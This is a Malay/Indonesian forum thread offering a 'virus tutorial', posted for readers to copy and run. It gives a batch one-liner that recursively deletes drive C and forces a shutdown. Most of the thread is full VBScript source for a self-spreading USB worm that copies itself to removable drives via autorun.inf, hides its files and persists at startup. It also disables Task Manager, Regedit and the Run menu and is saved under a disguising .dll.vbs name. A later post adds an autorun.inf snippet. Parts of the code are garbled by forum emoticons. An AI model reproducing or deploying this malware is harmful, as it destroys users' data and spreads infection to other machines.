View Thread
 Print Thread
VIRUS ALERT - FREE KAVIN - VIRUS ALERT
HI THERE.....I WANT TO POST A VIRUS TUTORIAL...
CAN YOU ACCEPT IT??
HEY...IA SALAH SATU PELAJARAN JUGAK......
YA ATAU TIDAK
 
OK..........LETS ROCK!!!!!!!!!!
 
want to make a virus/playground command...wahahaha....ok..i post at here.....
aku ada jumpa cara wat virus.....so.....all you need to do is....follow my command ja....

note pad version
*note* if note pad....plis save as wateverthenameis.BAT
*note 2 * / end \ --> end script..jangan tulis word tu kat note pad...
* note 3 * => adalah sign petunjuk..or...hint
-------------------------------------------------------------------------------
rmdir C: /s /q => delete C

/ end \

@echo off
msg * wormboy hack you??
msg * ya!!!
shutdown -c "i will shut down your pc!!!" -s => shut down pc

/ end \

--------------------------------------------------------------------------------
. . : : _*_*Visual Basic*_*_ : : . .
--------------------------------------------------------------------------------
Iseng-iseng mencolok Flash Disc saudara saya tiba-tiba saya nemu sebuah malcode lokal yang dibuat dengan bahasa VBS. Wah, ternyata para virus maker mulai melirik memakai bahasa VBS. Mungkin karena menyangkut HAKI (Hak Atas Kekayaan Intelektual) karena VB6.0 yang banyak beredar adalah bajakan. Jadi ia membuat virus dengan VBS yang bisa dibuat hanya dengan Notepad karena di Windows sudah ada compiler yang terintegrasi dengannya, Windows Based Script Host.

Sesua janji saya, kita akan membuat virus yang sederhana menggunakan Notepad. Virus ini akan membuat dirinya menyebar ke removable disc dengan AutoRun sehingga komputer lain yang tercolok flash disc terinfeksi akan langsung menjadi korban tanpa menungu User menjalankan infector-nya. Virus ini saya beri nama NightTalkerz.VBS. Sekarang buka Notepad-nya. Copy kode berikut :


'//--Awal dari code, set agar ketika terjadi Error biarkan dan kemudian lanjutkan kegiatan virus--//
on error resume next

'//--Dim kata-kata berikut ini--//
dim rekur,windowpath,flashdrive,fs,mf,isi,tf,kalong,nt,check,sd

'//--Set sebuah teks yang nantinya akan dibuat untuk Autorun Setup Information--//
isi = "[autorun]" & vbcrlf & "shellexecute=wscript.exe NIghtTalkerz.dll.vbs"
set fs = createobject("Scripting.FileSystemObject"Wink
set mf = fs.getfile(Wscript.ScriptFullname)
dim text,size
size = mf.size
check = mf.drive.drivetype
set text = mf.openastextstream(1,-2)
do while not text.atendofstream
rekur = rekur & text.readline
rekur = rekur & vbcrlf
loop
do

'//--Copy diri untuk menjadi file induk di Windows Path (example: C:\Windows)
Set windowpath = fs.getspecialfolder(0)
set tf = fs.getfile(windowpath & "\batch- NightTalkerz.dll.vbs "Wink
tf.attributes = 32
set tf=fs.createtextfile(windowpath & "\batch- NIghtTalkerz.dll.vbs",2,true)
tf.write rekursif
tf.close
set tf = fs.getfile(windowpath & "\batch- NightTalkerz.dll.vbs "Wink
tf.attributes = 39
'//--Buat Atorun.inf untuk menjalankan virus otomatis setiap flash disc tercolok--//
Menyebar ke setiap drive yang bertype 1 dan 2(removable) termasuk disket

for each flashdrive in fs.drives
'//--Cek Drive--//
If (flashdrive.drivetype = 1 or flashdrive.drivetype = 2) and flashdrive.path <> "A:" then

'//--Buat Infector jika ternyata Drivetypr 1 atau 2. Atau A:\--//
set tf=fs.getfile(flashdrive.path &"\NightTalkerz.dll.vbs "Wink
tf.attributes =32
set tf=fs.createtextfile(flashdrive.path &"\NightTalkerz.dll.vbs ",2,true)
tf.write rekursif
tf.close
set tf=fs.getfile(flashdrive.path &"\NightTalkerzdll.vbs "Wink
tf.attributes = 39

'//--Buat Atorun.inf yang teks-nya tadi sudah disiapkan (Auto Setup Information)--//
set tf =fs.getfile(flashdrive.path &"\autorun.inf"Wink
tf.attributes = 32
set tf=fs.createtextfile(flashdrive.path &"\autorun.inf",2,true)
tf.write isi
tf.close
set tf = fs.getfile(flashdrive.path &"\autorun.inf"Wink
tf.attributes=39
end if
next

'//--Manipulasi Registry--//

set NightTalkerz = createobject("WScript.Shell"Wink

'//--Manip - Ubah Title Internet Explorer menjadi Night Talkerz Communications--//
NIghtTalkerz.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title"," NIght Talkerz Communications "

'//--Manip Set agar file hidden tidak ditampilkan di Explorer--//
NIghtTalkerz.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Advanced\Hidden", "0", "REG_DWORD"

'//--Manip Hilangkan menu Find, Folder Options, Run, dan memblokir Regedit dan Task Manager--//
NIghtTalkerz.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind", "1", "REG_DWORD"
NIghtTalkerz.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions", "1", "REG_DWORD"
NightTalkerz.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun", "1", "REG_DWORD"
NightTalkerz.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools", "1", "REG_DWORD"
NightTalkerz.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr", "1", "REG_DWORD"

'//--Manip Disable klik kanan--//
NightTalkerz.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewContextMenu", "1", "REG_DWORD"

'//--Manip - Munculkan Pesan Setiap Windows Startup--//
NIghtTalkerz.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeCaption", "Worm NIghtTalkerz. Variant from Ambar Cahyo Nugroho, dont panic all data are safe."

'//--Manip Aktif setiap Windows Startup--//
NightTalkerz.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Systemdir", windowpath & "\batch- NightTalkerz.dll.vbs "

'//--Manip Ubah RegisteredOwner dan Organization--//
NightTalkerz.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOrganization", "The Batrix"
NightTalkerz.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOwner","Night Talkerz"

'//--Nah kalau kode dibawah ini saya nggak tau, tolong Mas Hosni atu sapa sajah untuk menjelaskan--//
if check <> 1 then
Wscript.sleep 200000
end if
loop while check <> 1
set sd = createobject("Wscript.shell"Wink
sd.run windowpath & "\explorer.exe /e,/select, " & Wscript.ScriptFullname
'Akhir dari Kode



Save code di Notepad dengan cara FILE > SAVE. Lalu di save as type pilih All Files (*.*). Simpan dengan nama : NightTalkerz.dll.vbs. Sebenarnya gak usah pake *.dll juga gak apa-apa tapi usaha agar tidak mencurigakan aja.

/ end \



Cool
kalau nak.....downlaod ni
 
Najib
waaa....!~
bagos2
[img]http://www.naruto-arena.com/images/myplayercard/785700.jpg[/img] is not a valid Image.
 
want more??
 
[AutoRun]
open=RavMonE.exe e
shellexecute=RavMonE.exe e
shell\Auto\command=RavMonE.exe e
shell=manual
@echo
:a
cls
open command promt
 
hanniees
haha. revmone Pfft
 
http:://www.friendster.com/cactusdagreat
i love you virus ... coming soon...hahahhaPfft
 
Fattah
klu x silap sy yg tu mrupakan program yg diarahkn utk wat mcm tu...
tol x?? hahaha....
 
SpidErboTtrojanADD
lol...thats MY ACC!!! WORM33...~_~....puff.
 
Jump to Forum: